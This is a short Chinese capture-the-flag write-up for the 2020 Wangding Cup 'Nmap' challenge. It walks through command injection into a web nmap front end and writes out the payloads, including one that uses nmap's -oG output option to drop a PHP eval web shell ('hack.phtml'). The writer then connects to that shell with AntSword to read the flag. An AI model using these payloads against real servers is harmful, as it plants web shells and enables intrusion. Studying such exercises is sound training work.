命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
星空寻流年9 小时前
设计模式第五章(门面模式)
android·设计模式
fionlsq10 小时前
uniapp集成原生安卓开发的插件
android·uni-app·小组件
风起云涌~13 小时前
【Android】kotlin.flow简介
android·开发语言·kotlin
深海呐13 小时前
Android 协程的基本使用和最简要原理概述
android·协程·android 协程·协程的原理
studyForMokey14 小时前
【Kotlin进阶】泛型的高级特性
android·开发语言·kotlin
袁震14 小时前
Android-kotlin MVVM框架搭建+Retrofit二次封装
android·kotlin·mvvm·retrofit
2501_9160074714 小时前
Java界面开发工具有哪些?常用Java GUI开发工具推荐、实战经验与对比分享
android·java·开发语言·ios·小程序·uni-app·iphone
铭哥的编程日记14 小时前
《Linux 基础 IO 完全指南:从文件描述符到缓冲区》
android·linux·运维
come1123416 小时前
Go 语言中的结构体
android·开发语言·golang